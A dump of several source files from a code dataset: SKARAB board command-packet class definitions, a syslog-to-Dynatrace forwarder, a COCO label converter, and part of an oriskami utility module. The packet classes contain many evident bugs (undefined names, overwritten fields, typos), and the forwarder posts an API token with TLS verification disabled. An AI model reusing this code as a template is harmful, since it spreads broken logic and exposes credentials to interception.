BoardReg\n\t\tself.uRegAddress = RegAddr\n\nclass sReadRegResp(object):\n\tdef __init__(self, commandID, seqNum, BoardReg, RegAddr, RegDataHigh, RegDataLow, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uBoardReg = BoardReg\n\t\tself.uRegAddress = RegAddr\n\t\tself.uRegDataHigh = RegDataHigh\n\t\tself.uRegDataLow = RegDataLow\n\t\tself.uPadding = Padding\n\n#WRITE_WISHBONE\nclass sWriteWishboneReq(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, WriteDataHigh, WriteDataLow):\n\t\tself.Header \t\t= sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh \t= AddressHigh\n\t\tself.uAddressLow \t= AddressLow\n\t\tself.uWriteDataHigh = WriteDataHigh\n\t\tself.uWriteDataHigh = WriteDataLow\n\t\t\nclass sWriteWishboneResp(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, WriteDataHigh, WriteDataLow, Padding):\n\t\tself.Header \t\t= sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh \t= AddressHigh\n\t\tself.uAddressLow \t= AddressLow\n\t\tself.uWriteDataHigh = WriteDataHigh\n\t\tself.uWriteDataHigh = WriteDataLow\n\t\tself.uPadding \t\t= Padding\n\n#READ_WISHBONE\nclass sReadWishboneReq(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow):\n\t\tself.Header \t\t= sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh \t= AddressHigh\n\t\tself.uAddressLow \t= AddressLow\n\nclass sReadWishboneResp(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, ReadDataHigh, ReadDataLow, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uReadDataHigh = ReadDataHigh\n\t\tself.uReadDataHigh = ReadDataLow\n\t\tself.uPadding = Padding\n\n#WRITE_I2C\n\nclass sWriteI2CReq(object):\n\tdef __init__(self, CommandID, seqNum, I2C_interface_id, SlaveAddress, NumBytes, WriteBytes):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uNumBytes = NumBytes\n\t\tself.uWriteBytes = WriteBytes\n\nclass sWriteI2CResp(object):\n\tdef __init__(self, CommandID, seqNum, I2C_interface_id, SlaveAddress, NumBytes, WriteBytes, WriteSuccess, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uNumBytes = NumBytes\n\t\tself.uWriteBytes = WriteBytes\n\t\tself.uWriteSuccess = WriteSuccess\n\t\tself.uPadding = Padding\n\n#READ_I2C\nclass sReadI2CReq(object):\n\tdef __init__(self, CommandID, seqNum, I2C_interface_id, SlaveAddress, NumBytes,):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uNumBytes = NumBytes\n\nclass sReadI2CResp(object):\n\tdef __init__(self, CommandID, seqNum, I2C_interface_id, SlaveAddress, NumBytes, ReadBytes, ReadSuccess, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uNumBytes = NumBytes\n\t\tself.uReadBytes = ReadBytes\n\t\tself.uReadSuccess = ReadSuccess\n\t\tself.uPadding = Padding\n\n#SDRAM_RECONFIGURE\nclass sSdramReconfigureReq(object):\n\tdef __init__(self, commandID, seqNum, OutputMode, ClearSdram, FinishedWriting, AboutToBoot, DoReboot, ResetSdramReadAddress, ClearEthernetStats, EnableDegbugSdramReadMode, DoSdramAsyncRead, DoContinuityTest, ContinuityTestOutputLow, ContinuityTestOutputHigh):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uOutputMode = OutputMode\n\t\tself.uClearSdram = ClearSdram\n\t\tself.uFinishedWriting = FinishedWriting\n\t\tself.uAboutToBoot = AboutToBoot\n\t\tself.uDoReboot = DoReboot\n\t\tself.uResetSdramReadAddress = ResetSdramReadAddress\n\t\tself.uClearEthernetStats = ClearEthernetStats\n\t\tself.uEnableDebugSdramReadMode = EnableDegbugSdramReadMode\n\t\tself.uDoSdramAsyncRead = DoSdramAsyncRead\n\t\tself.uDoContinuityTest = DoContinuityTest\n\t\tself.uContinuityTestOutputLow = ContinuityTestOutputLow\n\t\tself.uContinuityTestOutputHigh = ContinuityTestOutputHigh\n\nclass sSdramReconfigureResp(object):\n\tdef __init__(self, commandID, seqNum, OutputMode, ClearSdram, FinishedWriting, AboutToBoot, DoReboot, ResetSdramReadAddress, ClearEthernetStats, EnableDegbugSdramReadMode, DoSdramAsyncRead, NumEthernetFrames, NumEthernetBadFrames, NumEthernetOverloadFrames, SdramAsyncReadDataHigh, SdramAsyncReadDataLow, DoContinuityTest, ContinuityTestOutputLow, ContinuityTestOutputHigh):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uOutputMode = OutputMode\n\t\tself.uClearSdram = ClearSdram\n\t\tself.uFinishedWriting = FinishedWriting\n\t\tself.uAboutToBoot = AboutToBoot\n\t\tself.uDoReboot = DoReboot\n\t\tself.uResetSdramReadAddress = ResetSdramReadAddress\n\t\tself.uClearEthernetStats = ClearEthernetStats\n\t\tself.uEnableDebugSdramReadMode = EnableDegbugSdramReadMode\n\t\tself.uNumEthernetFrames = NumEthernetFrames\n\t\tself.uNumEthernetBadFrames = NumEthernetBadFrames\n\t\tself.uNumEthernetOverloadFrames = NumEthernetOverloadFrames\n\t\tself.uSdramAsyncReadDataHigh = SdramAsyncReadDataHigh\n\t\tself.uSdramAsyncReadDataLow = SdramAsyncReadDataLow\n\t\tself.uDoSdramAsyncRead = DoSdramAsyncRead\n\t\tself.uDoContinuityTest = DoContinuityTest\n\t\tself.uContinuityTestOutputLow = ContinuityTestOutputLow\n\t\tself.uContinuityTestOutputHigh = ContinuityTestOutputHigh\n\n#READ_FLASH_WORDS\nclass sReadFlashWordsReq(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, NumWords):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumWords = NumWords\n\nclass sReadFlashWordsResp(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, NumWords, ReadWords, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumWords = uNumWords\n\t\tself.uReadWords = ReadWords\n\t\tself.uPadding = Padding\n\n#PROGRAM_FLASH_WORDS\nclass sProgramFlashWordsReq(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, TotalNumWords, PacketNumWords, DoBufferedProgramming, StartProgram, FinishProgram, WriteWords):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uTotalNumWords = TotalNumWords\n\t\tself.uPacketNumWords = PacketNumWords\n\t\tself.uDoBufferedProgramming = DoBufferedProgramming\n\t\tself.uStartProgram = StartProgram\n\t\tself.uFinishProgram = FinishProgram\n\t\tself.uWriteWords = WriteWords\n\nclass sProgramFlashWordsResp(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, TotalNumWords, PacketNumWords, DoBufferedProgramming, StartProgram, FinishProgram, ProgramSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uTotalNumWords = TotalNumWords\n\t\tself.uPacketNumWords = PacketNumWords\n\t\tself.uDoBufferedProgramming = DoBufferedProgramming\n\t\tself.uStartProgram = StartProgram\n\t\tself.uFinishProgram = FinishProgram\n\t\tself.uProgramSuccess = ProgramSuccess\n\t\tself.uPadding = Padding\n\n#ERASE_FLASH_BLOCK\nclass sEraseFlashBlockReq(object):\n\tdef __init__(self, commandID, seqNum, BlockAddressHigh, BlockAddressLow):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uBlockAddressHigh = BlockAddressHigh\n\t\tself.uBlockAddressLow = BlockAddressLow\n\nclass sEraseFlashBlockResp(object):\n\tdef __init__(self, commandID, seqNum, BlockAddressHigh, BlockAddressLow, EraseSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uBlockAddressHigh = BlockAddressHigh\n\t\tself.uBlockAddressLow = BlockAddressLow\n\t\tself.uEraseSuccess = EraseSuccess\n\t\tself.uPadding = Padding\n\n#READ_SPI_PAGE\nclass sReadSpiPageReq(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, NumBytes):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumBytes = NumBytes\n\nclass sReadSpiPageResp(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, NumBytes, ReadBytes, ReadSpiPageSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumBytes = NumBytes\n\t\tself.uReadBytes = ReadBytes\n\t\tself.uReadSpiPageSuccess = ReadSpiPageSuccess\n\t\tself.uPadding = Padding\n\n#PROGRAM_SPI_PAGE\nclass sProgramSpiPageReq(object):\n\tdef __init__(self, CommandID, seqNum, AddressHigh, AddressLow, NumBytes, WriteBytes):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumBytes = NumBytes\n\t\tself.uWriteBytes = WriteBytes\n\nclass sProgramSpiPageResp(object):\n\tdef __init__(self, CommandID, seqNum, AddressHigh, AddressLow, NumBytes, VerifyBytes, ProgramSpiPageSuccess, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumBytes = NumBytes\n\t\tself.uVerifyBytes = VerifyBytes\n\t\tself.uProgramSpiPageSuccess = ProgramSpiPageSuccess\n\t\tself.uPadding = Padding\n\n#ERASE_SPI_SECTOR\nclass sEraseSpiSectorReq(object):\n\tdef __init__(self, commandID, seqNum, SectorAddressHigh, SectorAddressLow):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uSectorAddressHigh = SectorAddressHigh\n\t\tself.uSectorAddressLow = SectorAddressLow\n\n\nclass sEraseSpiSectorResp(object):\n\tdef __init__(self, commandID, seqNum, SectorAddressHigh, SectorAddressLow, EraseSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uSectorAddressHigh = SectorAddressHigh\n\t\tself.uSectorAddressLow = SectorAddressLow\n\t\tself.uEraseSuccess = EraseSuccess\n\t\tself.uPadding\t= Padding\n\n#ONE_WIRE_READ_ROM_CMD\nclass sOneWireReadROMReq(object):\n\tdef __init__(self, CommandID, seqNum, OneWirePort):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uOneWirePort(OneWirePort)\n\nclass sOneWireReadROMResp(object):\n\tdef __init__(self, CommandID, seqNum, OneWirePort, Rom, ReadSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uOneWirePort(OneWirePort)\n\t\tself.uRom = Rom\n\t\tself.uReadSuccess = ReadSuccess\n\t\tself.uPadding = Padding\n\n#ONE_WIRE_DS2433_WRITE_MEM\nclass sOneWireDS2433WriteMemReq(object):\n\tdef __init__(self, CommandID, seqNum, DeviceRom, SkipRomAddress, WriteBytes, NumBytes, TargetAddress1, TargetAddress2, OneWirePort):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uDeviceRom = DeviceRom\n\t\tself.uSkipRomAddress = SkipRomAddress\n\t\tself.uWriteBytes = WriteBytes\n\t\tself.uNumBytes = NumBytes\n\t\tself.uTA1 = TargetAddress1\n\t\tself.uTA2 = TargetAddress2\n\t\tself.uOneWirePort = OneWirePort\n\nclass sOneWireDS2433WriteMemResp(object):\n\tdef __init__(self, CommandID, seqNum, DeviceRom, SkipRomAddress, WriteBytes, NumBytes, TargetAddress1, TargetAddress2, OneWirePort, WriteSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uDeviceRom = DeviceRom\n\t\tself.uSkipRomAddress = SkipRomAddress\n\t\tself.uWriteBytes = WriteBytes\n\t\tself.uNumBytes = NumBytes\n\t\tself.uTA1 = TargetAddress1\n\t\tself.uTA2 = TargetAddress2\n\t\tself.uOneWirePort = OneWirePort\n\t\tself.uWriteSuccess = WriteSuccess\n\t\tself.uPadding = Padding\n\n#ONE_WIRE_DS2433_READ_MEM\nclass sOneWireDS2433ReadMemReq(object):\n\tdef __init__(self, CommandID, seqNum, DeviceRom, SkipRomAddress, NumBytes, TargetAddress1, TargetAddress2, OneWirePort):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uDeviceRom = DeviceRom\n\t\tself.uSkipRomAddress = SkipRomAddress\n\t\tself.uNumBytes = NumBytes\n\t\tself.uTA1 = TargetAddress1\n\t\tself.uTA2 = TargetAddress2\n\t\tself.uOneWirePort = OneWirePort\n\nclass sOneWireDS2433ReadMemResp(object):\n\tdef __init__(self, CommandID, seqNum, DeviceRom, SkipRomAddress, ReadBytes, NumBytes, TargetAddress1, TargetAddress2, OneWirePort, ReadSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uDeviceRom = DeviceRom\n\t\tself.uSkipRomAddress = SkipRomAddress\n\t\tself.uReadBytes = ReadBytes\n\t\tself.uNumBytes = NumBytes\n\t\tself.uTA1 = TargetAddress1\n\t\tself.uTA2 = TargetAddress2\n\t\tself.uOneWirePort = OneWirePort\n\t\tself.uReadSuccess = ReadSuccess\n\t\tself.uPadding = Padding\n\n#DEBUG_CONFIGURE_ETHERNET\nclass sDebugConfigureEthernetReq(object):\n\tdef __init__(self, commandID, seqNum, InterfaceID, FabricMacHigh, FabricMacMid, FabricMacLow, FabricPortAddress, GatewayArpCacheAddress, FabricIPAddressHigh, FabricIPAddressLow, FabricMultiCastIPAddressHigh, FabricMultiCastIPAddressLow, FabricMultiCastIPAddressMaskHigh, FabricMultiCastIPAddressMaskLow, EnableFabricInterface):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uFabricMacHigh = FabricMacHigh\n\t\tself.uFabricMacMid = FabricMacMid\n\t\tself.uFabricMacLow = FabricMacLow\n\t\tself.uFabricPortAddress = FabricPortAddress\n\t\tself.uGatewayArpCacheAddress = GatewayArpCacheAddress\n\t\tself.uFabricIPAddressHigh = FabricIPAddressHigh\n\t\tself.uFabricIPAddressLow = FabricIPAddressLow\n\t\tself.uFabricMultiCastIPAddressHigh = FabricMultiCastIPAddressHigh\n\t\tself.uFabricMultiCastIPAddressLow = FabricMultiCastIPAddressLow\n\t\tself.uFabricMultiCastIPAddressMaskHigh = FabricMultiCastIPAddressMaskHigh\n\t\tself.uFabricMultiCastIPAddressMaskLow = FabricMultiCastIPAddressMaskLow\n\t\tself.uEnableFabricInterface = EnableFabricInterface\n\nclass sDebugConfigureEthernetResp(object):\n\tdef __init__(self, commandID, seqNum, InterfaceID, FabricMacHigh, FabricMacMid, FabricMacLow, FabricPortAddress, GatewayArpCacheAddress, FabricIPAddressHigh, FabricIPAddressLow, FabricMultiCastIPAddressHigh, FabricMultiCastIPAddressLow, FabricMultiCastIPAddressMaskHigh, FabricMultiCastIPAddressMaskLow, EnableFabricInterface, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uFabricMacHigh = FabricMacHigh\n\t\tself.uFabricMacMid = FabricMacMid\n\t\tself.uFabricMacLow = FabricMacLow\n\t\tself.uFabricPortAddress = FabricPortAddress\n\t\tself.uGatewayArpCacheAddress = GatewayArpCacheAddress\n\t\tself.uFabricIPAddressHigh = FabricIPAddressHigh\n\t\tself.uFabricIPAddressLow = FabricIPAddressLow\n\t\tself.uFabricMultiCastIPAddressHigh = FabricMultiCastIPAddressHigh\n\t\tself.uFabricMultiCastIPAddressLow = FabricMultiCastIPAddressLow\n\t\tself.uFabricMultiCastIPAddressMaskHigh = FabricMultiCastIPAddressMaskHigh\n\t\tself.uFabricMultiCastIPAddressMaskLow = FabricMultiCastIPAddressMaskLow\n\t\tself.uEnableFabricInterface = EnableFabricInterface\n\t\tself.uPadding = Padding\n\n#DEBUG_ADD_ARP_CACHE_ENTRY\nclass sDebugAddARPCacheEntryReq(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, IPAddressLower8Bits, MacHigh, MacMid, MacLow):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uIPAddressLower8Bits = IPAddressLower8Bits\n\t\tself.uMacHigh = MacHigh\n\t\tself.uMacMid = MacMid\n\t\tself.uMacLow = MacLow\n\nclass sDebugAddARPCacheEntryResp(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, IPAddressLower8Bits, MacHigh, MacMid, MacLow, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uIPAddressLower8Bits = IPAddressLower8Bits\n\t\tself.uMacHigh = MacHigh\n\t\tself.uMacMid = MacMid\n\t\tself.uMacLow = MacLow\n\t\tself.uPadding = Padding\n\n#GET_EMBEDDED_SOFTWARE_VERS\nclass sGetEmbeddedSoftwareVersionReq(object):\n\tdef __init__(self, CommandID, seqNum):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\nclass sGetEmbeddedSoftwareVersionResp(object):\n\tdef __init__(self, CommandID, seqNum, VersionMajor, VersionMinor, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uVersionMajor = VersionMinor\n\t\tself.uVersionMinior = VersionMinor\n\t\tself.uPadding = Padding\n\n#PMBUS_READ_I2C\nclass sPMBusReadI2CBytesReq(object):\n\tdef __init__(self, commandID, seqNum, I2C_interface_id, SlaveAddress, CommandCode, NumBytes):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uCommandCode = CommandCode\n\t\tself.uNumBytes = NumBytes\n\nclass sPMBusReadI2CBytesResp(object):\n\tdef __init__(self, commandID, seqNum, I2C_interface_id, SlaveAddress, CommandCode, ReadBytes, NumBytes, ReadSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uCommandCode = CommandCode\n\t\tself.uReadBytes = ReadBytes\n\t\tself.uNumBytes = NumBytes\n\t\tself.uReadSuccess = ReadSuccess\n\t\tself.uPadding = Padding\n\n#SDRAM_PROGRAM\nclass sSdramProgramReq(object):\n\tdef __init__(self, commandID, seqNum, FirstPacket, LastPacket, WriteWords):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\t\t\n\t\tself.uFirstPacket = FirstPacket\n\t\tself.uLastPacket = LastPacket\n\t\tself.uWriteWords = WriteWords\n\n#CONFIGURE_MULTICAST\nclass sConfigureMulticastReq(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, FabricMultiCastIPAddressHigh, FabricMultiCastIPAddressLow, FabricMultiCastIPAddressMaskHigh, FabricMultiCastIPAddressMaskLow):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uFabricMultiCastIPAddressHigh = FabricMultiCastIPAddressHigh\n\t\tself.uFabricMultiCastIPAddressLow = FabricMultiCastIPAddressMaskLow\n\t\tself.uFabricMultiCastIPAddressMaskHigh = FabricMultiCastIPAddressMaskHigh\n\t\tself.uFabricMultiCastIPAddressMaskLow = FabricMultiCastIPAddressMaskLow\n\nclass sConfigureMulticastResp(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, FabricMultiCastIPAddressHigh, FabricMultiCastIPAddressLow, FabricMultiCastIPAddressMaskHigh, FabricMultiCastIPAddressMaskLow, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uFabricMultiCastIPAddressHigh = FabricMultiCastIPAddressHigh\n\t\tself.uFabricMultiCastIPAddressLow = FabricMultiCastIPAddressMaskLow\n\t\tself.uFabricMultiCastIPAddressMaskHigh = FabricMultiCastIPAddressMaskHigh\n\t\tself.uFabricMultiCastIPAddressMaskLow = FabricMultiCastIPAddressMaskLow\n\t\tse.uPadding = Padding\n\n#DEBUG_LOOPBACK_TEST\nclass sDebugLoopbackTestReq(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, TestData):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uTestData = TestData\n\nclass sDebugLoopbackTestResp(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, TestData, Valid, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uTestData = TestData\n\t\tself.uValid = Valid\n\t\tself.uPadding = Padding\n\n#QSFP_RESET_AND_PROG\nclass sQSFPResetAndProgramReq(object):\n\tdef __init__(self, CommandID, seqNum, Reset, Program):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uReset = Reset\n\t\tself.uProgram = Program\n\nclass sQSFPResetAndProgramResp(object):\n\tdef __init__(self, CommandID, seqNum, Reset, Program, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uReset = Reset\n\t\tself.uProgram = Program\n\t\tself.uPadding = Padding\n\n#Mezzanine Site Identifiers\nclass sMezzanine(object):\n\tMezzanine0 = 0\n\tMezzanine1 = 1\n\tMezzanine2 = 2\n\tMezzanine3 = 3\n\n#Temperature Sensor Identifiers\nclass sTempsensor(object):\n\tInletTemp = 0\n\tOutletTemp = 1\n\tFPGATemp = 2\n\tMezzanine0Temp = 3\n\tMezzanine1Temp = 4\n\tMezzanine2Temp = 5\n\tMezzanine3Temp = 6\n\tFanContTemp = 7\n\n#Fan Identifiers\nclass sFan(object):\n\tLeftFrontFan = 0\n\tLeftMiddleFan = 1\n\tLeftBackFan = 2\n\tRightBackFan = 3\n\tFPGAFan = 4\n\n#Voltage Identifiers\nclass sVoltage(object):\n\tP12V2Voltage = 0\n\tP12VVoltage = 1\n\tP5VVoltage = 2\n\tP3V3Voltage = 3\n\tP2V5Voltage = 4\n\tP1V8Voltage = 5\n\tP1V2Voltage = 6\n\tP1V0Voltage = 7\n\tP1V8MGTVCCAUXVoltage = 8\n\tP1V0MGTAVCCVoltage = 9\n\tP1V2MGTAVTTVoltage = 10\n\tP3V3ConfigVoltage = 11\n\n#Current Identifiers\nclass sCurrent(object):\n\tP12V2Current = 0\n\tP12VCurrent = 1\n\tP5VCurrent = 2\n\tP3V3Current = 3 \n\tP2V5Current = 4\n\tP1V8Current = 5\n\tP1V2Current = 6\n\tP1V0Current = 7\n\tP1V8MGTVCCAUXCurrent = 8\n\tP1V0MGTAVCCCurrent = 9\n\tP1V2MGTAVTTCurrent = 10\n\tP3V3ConfigCurrent = 11","sub_path":"skarabdefs.py","file_name":"skarabdefs.py","file_ext":"py","file_size_in_byte":27648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"282200669","text":"#!/usr/bin/env python\n\n# Tiny Syslog Server in Python.\n##\n# inspired by :\n# https://gist.github.com/marcelom/4218010 \n# https://github.com/choeffer/py3syslog\n\nimport os\nimport sys\nimport requests\nimport json\nimport configparser\nimport socketserver\nimport logging\n\n\nclass SyslogUDPHandler(socketserver.BaseRequestHandler):\n\n def handle(self):\n data = bytes.decode(self.request[0].strip())\n socket = self.request[1]\n #print(\"%s : \" % self.client_address[0], str(data))\n logging.info(str(data))\n self.sendtodynatrace(str(data),self.client_address[0], dtendpointurl,dttoken)\n\n # --------------------------------------------------------------------------------\n\n def sendtodynatrace(self, theresult, thesource, theurl, thetoken):\n\n thejson = [{\"content\": theresult,\"log.source\": thesource}]\n\n rdt = requests.post(\n theurl+'/api/v2/logs/ingest',\n data=json.dumps(thejson),\n headers={\n 'Authorization': \"Api-Token \" + thetoken,\n 'Content-Type': 'application/json; charset=utf-8',\n 'Accept': 'application/json; charset=utf-8',\n\n },\n verify=False\n )\n\n # error ?\n if(rdt.status_code != 204):\n logging.error(rdt.status_code, rdt.reason, rdt.text)\n else:\n logging.info(\"Successfully pushed log data to Dynatrace ingestion endpoint from \"+thesource+\".\")\n logging.debug(rdt.text)\n# --------------------------------------------------------------------------------\n\n\nif __name__ == \"__main__\":\n\n requests.packages.urllib3.disable_warnings()\n\n # open properties file\n config = configparser.ConfigParser()\n config.read(os.path.join(sys.path[0], \"config.properties\"))\n\n # get properties\n dttoken = config.get('dynatrace', 'dt_api_token')\n dtendpointurl = config.get('dynatrace', 'dt_endpoint_url')\n syslogip=config.get('syslog', 'syslog_ip')\n syslogport=int(config.get('syslog', 'syslog_port'))\n loggingpath=config.get('logging', 'logging_path')\n\n logging.basicConfig(filename=loggingpath,format='%(asctime)s %(message)s', level=logging.INFO)\n\n try:\n server = socketserver.UDPServer((syslogip, syslogport), SyslogUDPHandler)\n server.serve_forever(poll_interval=0.5)\n except (IOError, SystemExit):\n raise\n except KeyboardInterrupt:\n print(\"Crtl+C Pressed. Shutting down.\")\n","sub_path":"src/dtsyslogd.py","file_name":"dtsyslogd.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"318375436","text":"from pycocotools.coco import COCO\nfrom yolov3.cfg import COCO_ANN_FILE, COCO_CLASS, LABEL_FILE, IMG_SIZE\n\n\ndef convert(mode='train'):\n with open(LABEL_FILE[mode], 'w+') as f:\n coco = COCO(COCO_ANN_FILE[mode])\n catIds = coco.getCatIds(catNms=COCO_CLASS)\n\n cats = {}\n for cat in coco.loadCats(catIds):\n cats[cat['id']] = cat['name']\n\n imgIds = coco.getImgIds(catIds=catIds)\n for imgId in imgIds:\n img = coco.loadImgs(imgId)[0]\n\n img_file_name = img['file_name']\n w, h = img['width'], img['height']\n w_scale, h_scale = w / IMG_SIZE['width'], h / IMG_SIZE['height']\n\n annIds = coco.getAnnIds(imgIds=img['id'], catIds=catIds, iscrowd=None)\n anns = coco.loadAnns(annIds)\n\n f.write(img_file_name)\n for ann in anns:\n category_name = cats[ann['category_id']]\n cls = COCO_CLASS.index(category_name)\n\n _x1, _y1, _w, _h = ann['bbox']\n _cx, _cy = _x1 + _w / 2, _y1 + _h / 2\n cx, cy, w, h = _cx / w_scale, _cy / h_scale, _w / w_scale, _h / h_scale\n f.write(f\" {cls} {cx} {cy} {w} {h}\")\n f.write(\"\\n\")\n f.flush()\n\n\nif __name__ == \"__main__\":\n # convert(mode='train')\n convert(mode='val')\n","sub_path":"yolov3/coco_convert.py","file_name":"coco_convert.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"459859211","text":"from __future__ import print_function\n\nimport hmac\nimport logging\nimport sys\nimport os\nimport re\n\nimport oriskami\n\n\nORISKAMI_LOG = os.environ.get('ORISKAMI_LOG')\n\nlogger = logging.getLogger('oriskami')\n\n__all__ = [\n 'StringIO',\n 'json',\n 'utf8',\n 'log_info',\n 'log_debug',\n 'dashboard_link',\n 'logfmt',\n]\n\ntry:\n # When cStringIO is available\n import cStringIO as StringIO\nexcept ImportError:\n from io import StringIO\n\ntry:\n import json\nexcept ImportError:\n json = None\n\nif not (json and hasattr(json, 'loads')):\n try:\n import simplejson as json\n except ImportError:\n if not json:\n raise ImportError(\n \"Oriskami requires a JSON library, such as simplejson. \"\n \"HINT: Try installing the \"\n \"python simplejson library via 'pip install simplejson' or \"\n \"'easy_install simplejson', or contact support@oriskami.com \"\n \"with questions.\")\n else:\n raise ImportError(\n \"Oriskami requires a JSON library with the same interface as \"\n \"the Python 2.6 'json' library. You appear to have a 'json' \"\n \"library with a different interface. Please install \"\n \"the simplejson library. HINT: Try installing the \"\n \"python simplejson library via 'pip install simplejson' \"\n \"or 'easy_install simplejson', or contact support@oriskami.com\"\n \"with questions.\")\n\n\ndef utf8(value):\n # Note the ordering of these conditionals: `unicode` isn't a symbol in\n # Python 3 so make sure to check version before trying to use it. Python\n # 2to3 will also boil out `unicode`.\n if sys.version_info < (3, 0) and isinstance(value, unicode):\n return value.encode('utf-8')\n else:\n return value\n\n\ndef is_appengine_dev():\n return ('APPENGINE_RUNTIME' in os.environ and\n 'Dev' in os.environ.get('SERVER_SOFTWARE', ''))\n\n\ndef _console_log_level():\n if oriskami.log in ['debug', 'info']:\n return oriskami.log\n elif ORISKAMI_LOG in ['debug', 'info']:\n return ORISKAMI_LOG\n else:\n return None\n\n\ndef log_debug(message, **params):\n msg = logfmt(dict(message=message, **params))\n if _console_log_level() == 'debug':\n print(msg, file=sys.stderr)\n 